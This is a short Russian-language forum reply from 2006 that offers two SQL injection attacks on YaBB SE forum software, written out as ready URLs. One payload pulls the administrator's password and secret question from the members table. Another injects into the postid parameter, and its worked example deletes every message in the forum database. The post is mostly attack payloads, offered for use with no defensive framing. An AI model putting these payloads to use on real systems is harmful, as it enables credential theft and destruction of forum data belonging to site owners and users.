Показать сообщение отдельно

  #4  
Старый 10.07.2006, 09:32
zyl
Познающий
Регистрация: 19.04.2006
Сообщений: 40
С нами: 10558524

Репутация: 47
По умолчанию

Конечно я тебе ничем не помогу но попробуй следущее:

1. SQL инъекция в '$msg' параметре:
Код:
http://vulnhost/forum/index.php?board=1;action=modif y;threadid=1;quote=1;start=0;
sesc=aae1f7d45d5e54c853e9e2314fb982a1;msg=-12)+UNION+SELECT+3,null,2,
concat(passwd,%27-%27,secretQuestion),null,null,null,null,null,null, null,null,
null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*
2. SQL инъекция в параметре '$postid' в функции ModifyMessage2:
Код:
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Пример эксплоита, который удаляет все сообщения их базы данных:
Код:
http://[target]/forum/index.php?board=1;action=modify2;msg=2;threadid=2;start=0;
sesc=aa e1f7d45d5e54c853e9e2314fb982a1;subject=hola;message=hola;waction=deletemodify;
postid=1+or+1=1+ORDER+BY+ID_MSG+DESC/*
Если появятся лишние пробелы - убери
 
Ответить с цитированием